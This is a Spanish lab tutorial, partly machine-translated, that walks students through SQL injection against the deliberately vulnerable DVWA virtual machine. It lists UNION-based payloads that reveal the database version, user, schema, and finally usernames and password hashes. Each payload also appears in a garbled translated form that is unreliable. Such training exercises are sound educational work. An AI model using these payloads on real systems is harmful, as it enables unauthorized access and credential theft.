SQL injection

Usa la técnica SQL injection para obtener información relevante sobre la estructura de una base de datos.

Para ello necesitaras usar una máquina virtual preparada para el software de simulación VirtualBox.

puedes descargar el instalador desde la siguiente página web:

https://www.virtualbox.org/wiki/Downloads

Una vez descargada la máquina estos son los pasos a seguir:

1. Descomprimir utilizando un software de compresión compatible con 7-Zip (puedes descargar este último desde su página web).

2. Entrar en la carpeta en la que se ha descomprimido el 7-zip de la máquina. Allí encontraremos unos ficheros llamados dvwa-windows.vbox (puede que la extensión esté oculta, dependiendo de la configuración del explorador de ficheros) y dvwa-linux. vbox.

3. Hacemos doble clic sobre el fichero que corresponda al sistema operativo que estemos usando en nuestro ordenador (p. ej. si estamos usando Linux hacemos doble clic sobre el fichero dvwa-linux.vbox).

4. Al hacer doble clic se importará la máquina virtual en VirtualBox.

5. Seleccionamos con el ratón la máqina que se llama "dvwa" y pulsamos sobre el botón llamado "Iniciar":

6. Cuando termine de iniciarse la máquina virtual obtendremos la siguiente pantalla, donde se nos muestra la dirección IP que ha obtenido por DHCP, y que deberemos usar posteriormente para conectarnos a ella:

7. Una vez ejecutada la máquina, anota la dirección IP y mediante el navegador web accede a la dirección http://192.168.1.75/login.php

8. A continuación seguir las indicaciones de los apartados 7, 8 y 9 de ESTE ARTÍCULO.

                    Sección 7: Entrar DVWA                                                        

Inicie Google chrome

• Instrucciones:
1. Haga clic en google chrome
2. Inicia sesión para DVWA
   • Instrucciones:
   1. Inicie google chrome en BackTrack
   2. Lugar http: // 192.168.1.75 /dvwa/login.php en la barra de direcciones.
      • Reemplace 192.168.1.75 con la dirección de Fedora IP obtenida.
   3. Login: admin
   4. Contraseña: contraseña
   5. Haga clic en Inicio de sesión
   
   
   
   
   

             Sección 8: Ajuste de nivel de seguridad                                           

Establecer DVWA Nivel de seguridad

• Instrucciones:
1. Haga clic en DVWA de Seguridad, en el menú de la izquierda.
2. Selecciona "bajo"
3. Haga clic en Envia

           Sección 9: Manual de Inyección SQL                                                       

SQL Injection Menú

• Instrucciones:
1. Seleccione "inyección SQL" en el menú de navegación izquierdo.

2. Inyección básica

• Instrucciones:
  1. De entrada "1" en el cuadro de texto.
  2. Haga clic en Enviar.
  3. Tenga en cuenta, es la página web / Código supone imprimir ID, ​​Nombre, Apellidos y a la pantalla.
• Notas (FYI):
  • A continuación se muestra la instrucción select PHP que estaremos explotando, específicamente $ id.
    • $ getId = "SELECT first_name, last_name FROM usuarios WHERE user_id = '$ id'";

3. Siempre Fiel Escenario

• Instrucciones:
  1. Introduzca el texto a continuación en el cuadro de texto ID (ver foto).
     • % 'O' 0 '=' 0, %' or '0'='0
  2. Haga clic en Enviar
• Notas (FYI):
• En este escenario, estamos diciendo pantalla todos los registros que son falsas y todos los registros que son verdad.
  •  % '- Probablemente no será igual a cualquier cosa, y será falsa.
  • '0' = '0' - Es igual a verdad, porque 0 siempre será igual a 0.
• Declaración de la base de datos
• mysql> SELECT first_name, last_name FROM usuarios WHERE user_id = '%' o '0' = '0'

4. Pantalla Database Versión

• Instrucciones:
  1. Introduzca el texto a continuación en el cuadro de texto ID (ver foto).
     • % 'O 0 = 0 UNION SELECT nulo, versión () #
     • %' or 0=0 union select null,version()#
  2. Haga clic en Enviar
• Notas (FYI):
  • Aviso en la última línea aparece, 01.05.60 se muestra en el apellido.
  • Esta es la versión de la base de datos mysql.

5. Mostrar bases de datos del usuario

• Instrucciones:
  1. Introduzca el texto a continuación en el cuadro de texto ID (ver foto).
     • % 'O 0 = 0 UNION SELECT nulo, el usuario () #
     •  %' or 0=0 union select null, user() #
• Notas (FYI):
  • Aviso en la última línea aparece, root @ localhost se muestra en el apellido.
  • Este es el nombre de la base de datos de usuario que ejecuta el código detrás de la escenas PHP.

6. Mostrar nombre de base de datos

• Instrucciones:
  1. Introduzca el texto a continuación en el cuadro de texto ID (ver foto).
     • % 'O 0 = 0 UNION SELECT nulo, la base de datos () #
     • %' or 0=0 union select null, database() #
• Notas (FYI):
  • Aviso en la última línea aparece, DVWA se muestra en el apellido.
  • Este es el nombre de la base de datos.

7. Mostrar todas las tablas de INFORMATION_SCHEMA

• Instrucciones:
  1. Introduzca el texto a continuación en el cuadro de texto ID (ver foto).
     • % 'Y 1 = 0 UNION SELECT nulo, nombre_tabla de INFORMATION_SCHEMA.TABLES #
     • %' and 1=0 union select null, table_name from information_schema.tables #
  2. Haga clic en Enviar
• Notas (FYI):
  • Ahora estamos mostrando todas las tablas de la base de datos INFORMATION_SCHEMA en.
  • El INFORMATION_SCHEMA es la base de datos de información, el lugar que almacena información acerca de todas las otras bases de datos que el servidor MySQL mantiene.

8. Mostrar todas las tablas de usuario en INFORMATION_SCHEMA

• Instrucciones:
  1. Introduzca el texto a continuación en el cuadro de texto ID (ver foto).
     • % 'Y 1 = 0 UNION SELECT nulo, nombre_tabla de INFORMATION_SCHEMA.TABLES donde nombre_tabla como "usuario%' #
     • %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
  2. Haga clic en Enviar
• Notas (FYI):
  • Ahora estamos mostrando todas las tablas que comienzan con el "usuario" prefijo en la base de datos INFORMATION_SCHEMA.

9. Mostrar todos los campos columnas en la tabla de usuario INFORMATION_SCHEMA

• Instrucciones:
  1. Introduzca el texto a continuación en el cuadro de texto ID (ver foto).
     • % 'Y 1 = 0 UNION SELECT nulo, concat (nombre_tabla, 0x0a, column_name) de INFORMATION_SCHEMA.COLUMNS donde nombre_tabla =' # 'usuarios
     • %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
  2. Haga clic en Enviar
• Notas (FYI):
  • Ahora estamos mostrando todos las columnas de la usuarios tabla.
  • Observe que hay un user_id, first_name, last_name, el usuario y contraseña de la columna.

Mostrar todas las columnas de campo contenidos en la tabla de usuario INFORMATION_SCHEMA

• Instrucciones:
  1. Introduzca el texto a continuación en el cuadro de texto ID (ver foto).
     • % 'Y 1 = 0 UNION SELECT nulo, concat (first_name, 0x0a, apellidos, 0x0a, usuario, 0x0a, password) de usuarios #
     • 
       
     • %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
  2. Haga clic en Enviar
• Notas (FYI):
  • Ahora que hemos mostrado con éxito toda la información de autenticación necesaria en esta base de datos.

9. Una vez realizada la tarea, apagar la máquina virtual haciendo login mediante el nombre de usuario apagar.